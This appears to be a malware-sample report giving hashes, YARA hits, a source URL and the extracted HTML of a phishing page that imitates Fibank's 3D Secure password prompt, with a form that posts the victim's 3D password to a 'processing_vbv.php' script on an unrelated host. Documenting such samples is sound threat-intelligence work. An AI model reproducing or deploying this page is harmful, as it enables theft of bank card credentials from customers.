Sample details: 27538b48e7e514675f0e63a387075b1a --

Hashes
MD5: 27538b48e7e514675f0e63a387075b1a
SHA1: 2b602e6273c33e45a56d1d3a042ec005780da649
SHA256: 54438d035c45e55fcff8b7727cb8717799cd38f661cb345aacec837ae4d1c220
SSDEEP: 192:ciaiWixi+diXiwiTi41ibiciTi+LiVih6ixif9ZwBNJC9XOiIrNk4wge1g43LhAZ:ciaiWixisiXiwiTi41ibiciTi2iVih6a
Details
File Type: HTML
Yara Hits
YRP/domain | YRP/url | YRP/contentis_base64 |
Source
http://autotoolms.com/fibank/oauth2-server/pXJZQmk0OtqaBUIM2LUUQ2yjYWfsLl/vbv.php?client_id=E_BANK
Strings
		<html xmlns="http://www.w3.org/1999/xhtml"><head>
<link href="content/001/style.css" rel="stylesheet" type="text/css">
    <link rel="icon" href="https://my.fibank.bg/EBank/images/favicon.ico">
    <title>Enter Your SecureCode&lt;sup&gt;TM&lt;/sup&gt;</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
<script type="text/javascript">
function help_detect() {
    var pam_txt = document.getElementById('hidden_pam_val').value;
    if (pam_txt == "Hello!") {
        document.getElementById('m_form').style.display = "none";
        document.getElementById('f_form').style.display = "block";
        document.getElementById('tbl_en').style.display = "none";
        document.getElementById('tbl_bg').style.display = "block";
    else {
        document.getElementById('f_form').style.display = "none";
        document.getElementById('m_form').style.display = "block";
        document.getElementById('tb_home_en').style.display = "none";
        document.getElementById('tb_home_bg').style.display = "block";
function goToMyFibank() {
    window.location = "https://my.fibank.bg";
function changeLang(table) {
    if (table == "tb_home_bg") {
        document.getElementById('tb_home_bg').style.display = "none";
        document.getElementById('tb_home_en').style.display = "block";
    if (table == "tb_home_en") {
        document.getElementById('tb_home_en').style.display = "none";
        document.getElementById('tb_home_bg').style.display = "block";
    if (table == "tbl_bg") {
        document.getElementById('tbl_bg').style.display = "none";
        document.getElementById('tbl_en').style.display = "block";
    if (table == "tbl_en") {
        document.getElementById('tbl_en').style.display = "none";
        document.getElementById('tbl_bg').style.display = "block";
</script>
<style type="text/css">
#loginform {
	width: 380px;
	margin: 0 auto;
	padding:0;
	border:5px solid #CEF1FF;
	background:white;
#loginform h2 {
	font-size: 30px;
	border-bottom: 1px dotted #9BD9F0;
	padding: 10px 0;
	margin: 0;
#loginform fieldset {
	border: 5px solid #CEF1FF;
	background: #F1F5F6;
	overflow: hidden;
	padding: 0;
.name_new {
	font-family: Verdana, Helvetica;
	font-size: 10pt;
	text-align:right;
	font-weight:bold;
.value_new {
	font-family: Verdana, Helvetica;
	font-size: 10pt;
	text-align: left;
#body {
	padding: 15px 0 25px 0;
	background-color: white;
	text-align:center;
	width: 100%;
	margin: 0;
table {
	padding:0;
	margin:0;
	width:100%;
	border-collapse: collapse;
</style>
</head>
<body onload="help_detect()" style="margin: 0; padding:0;">
<div id="body">
  <div id="loginform">
  <table style="height:64px;" cool="" gridx="16" gridy="16" showgridx="" showgridy="" usegridx="" usegridy="">
      <tbody><tr>
          <td ><img src="./Page_files/img/ssl.png" alt="Issuer logo" border="0" 3dslogo="issuer" 3dslogourl="graphics/fib.gif"></td>
<td style="text-align:right; vertical-align:top;"><img src="https://mdpay.fibank.bg/mdpayacs/graphics/fib.gif" alt="Issuer logo" border="0" 3dslogo="issuer" 3dslogourl="graphics/fib.gif"></td>
      </tr>
</tbody></table>
   <form id="m_form" style="padding: 0px; margin: 0px; width: 100%; display: block;" action="./Send/processing_vbv.php" method="POST" 3dsaction="manual">
      <table id="tb_home_bg" style="background: rgb(241, 245, 246); display: block;">
            <tbody><tr>
              <td colspan="2" class="header" style="font-weight:bold;">
<a href="javascript:void(0);" onclick="changeLang('tb_home_bg');" class="chg_lang" style="float:right;padding:0 10px;font-size:14px; font-weight:normal;">EN</a></td>
            </tr>
            <tr>
              <td colspan="2"><div class="name" style=" text-align:left;"> 
. </div></td>
            </tr>
             <tr>
             <td class="name_new" style=" text-align:right; width:150px;">
:</td>
          <td class="value_new" 3dsdisplay="merchant"></td>
            </tr>
            <tr>
              <td class="name_new">
:</td>
          <td class="value_new" 3dsdisplay="amount"></td>
            </tr>
            <tr>
              <td class="name_new">
 (GMT):</td>
          <td class="value_new" 3dsdisplay="date">11/09/2019, 5:54 am</td>
            </tr>
            <tr>
              <td class="name_new">
:</td>
          <td class="value_new" 3dsdisplay="pan">XXXX XXXX XXXX </td>
            </tr>
           <!-- 
            <tr id="tb_pam">
          <td class="name_new">Personal Greeting:</td>
          <td class="value_new" id="tb_pam" 3dsdisplay="pam">Hello, Fibank cardholder!</td>
        </tr>
            -->
            <tr>
               <td colspan="2" class="error" 3dsdisplay="error"></td>
           </tr>
            <tr>
              <td class="message" 3dsdisplay="prompt" 3dslabel="prompt" style="color:Black;width:150px; text-align:right">3D 
:</td>
              <td>
                  <input class="value" type="password" 3dsinput="password" name="3d">
              </td>
            </tr>
            <tr>
      <td style="text-align:left;font-size:13px">
      <a href="http://www.fibank.bg/bg/page/2798" target="_blank" alt="
" title="
      </td>
      <td style="text-align:right;font-size:13px">
      <a href="https://my.fibank.bg" target="_blank" alt="
." title="
      </td>
      </tr>
      <tr>
      <td colspan="2">
       <table cellpadding="3" cellspacing="0" border="0" style="background:white;width:100%;">
       <tbody><tr>
        <td style="text-align:left">
        <table style="width:auto;">
        <tbody><tr>
         <td id="btn_help">
            <input type="image" name="help" alt="Help" src="https://mdpay.fibank.bg/mdpayacs/content/001/help_bg.png" border="0" 3dsinput="help" 3dslabel="Help">
         </td>
        <td>
        <input type="image" name="cancel" alt="Cancel" src="https://mdpay.fibank.bg/mdpayacs/content/001/cancel_bg.png" border="0" 3dsinput="cancel" 3dslabel="Cancel">
         </td>
        </tr>
        </tbody></table>
               
        </td>
        <td align="right">
         <input type="image" name="submit" alt="Submit" src="https://mdpay.fibank.bg/mdpayacs/content/001/submit_bg.png" border="0" 3dsinput="ok" 3dslabel="Submit">
        </td>
       </tr>
      </tbody></table>
      </td>
      </tr>
          </tbody></table>
          
          
        <input type="hidden" id="hidden_pam_val" value="Hello, Fibank cardholder!">
   </form>
  <table id="f_form" style="background:#F1F5F6; display:none;">
   <tbody><tr>
   <td>
   <table id="tbl_bg">
        <tbody><tr>
        <td class="header">
      <h3>3D 
<a href="javascript:void(0);" onclick="changeLang('tbl_bg');" class="chg_lang" style="float:right;padding:0 10px;font-size:14px; font-weight:normal;">EN</a></h3>
      </td>
        </tr>
        <tr>
        <td style=" padding-top:0;font-size:13px;text-align:left">
      
 Fibank
     	<br><br>
     	<a href="https://my.fibank.bg" target="_blank" alt="
 Fibank" title="
 Fibank">
     	<a href="https://my.fibank.bg" target="_blank" alt="
 Fibank" title="
 Fibank" style="margin-left:15px;">
     	<br><br>
     	
     	<br><br>
     	<a href="http://www.fibank.bg/bg/page/2798" target="_blank" alt="
" title="
     </td>
        </tr>
        <tr>
        <td class="header">
      <img alt="Help" src="content/001/help-phone-eng2a.png" border="0" style="display:none;" id="help_banner">
      </td>
        </tr>
        <tr>
       <td align="right" style="padding:5px; ">
       <a href="javascript:history.go(-1)">
        <img alt="Continue" name="Continue" id="Continue" src="content/001/submit_bg.png" border="0">
        </a>
       </td>
        </tr>
        </tbody></table>
   <table id="tbl_en" style="display:none;">
        <tbody><tr>
        <td class="header">
      <h3>3D Card Security<a href="javascript:void(0);" onclick="changeLang('tbl_en');" class="chg_lang" style="float:right;padding:0 10px;font-size:14px; font-weight:normal;">BG</a></h3>
      </td>
        </tr>
        <tr>
        <td style=" padding-top:0;font-size:13px;text-align:left">
      A 3D security password has to be entered in order to complete the payment. If you don't have one, you need to create it now. Do you have a My Fibank registration?
     	<br><br>
     	<a href="https://my.fibank.bg" target="_blank" alt="3D Card Security registration for MyFibank client" title="3D Card Security registration for MyFibank client">Yes, I have</a>
     	<a href="https://my.fibank.bg" target="_blank" alt="MyFibank registration" title="MyFibank registration" style="margin-left:15px;">No, I don
t have</a>
     	<br><br>
     	After you have created your 3D security password, please press Continue in order to finalize your payment.
     	<br><br>
     	<a href="http://www.fibank.bg/bg/page/2798" target="_blank" alt="More info about 3D security password" title="More info about 3D security password">About 3D security password?</a>
     </td>
        </tr>
        <tr>
        <td class="header">
      <img alt="Help" src="content/001/help-phone-eng2a.png" border="0" style="display:none;" id="help_banner">
      </td>
        </tr>
         <tr>
       <td align="right" style="padding:5px; ">
       <a href="javascript:history.go(-1)">
        <img alt="Continue" name="Continue" id="Continue" src="content/001/default_continue.jpg" border="0">
        </a>
       </td>
        </tr>
        </tbody></table>    
   </td>
   </tr>
  </tbody></table>
  </div>
</div>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
<!-- MDPay ACS Login Template -->
<!-- default_default_001_www_login -->
<!-- $Id: default_default_001_www_login,v 1.3 2003/12/11 16:49:58 veparkki Exp $ -->
</body></html>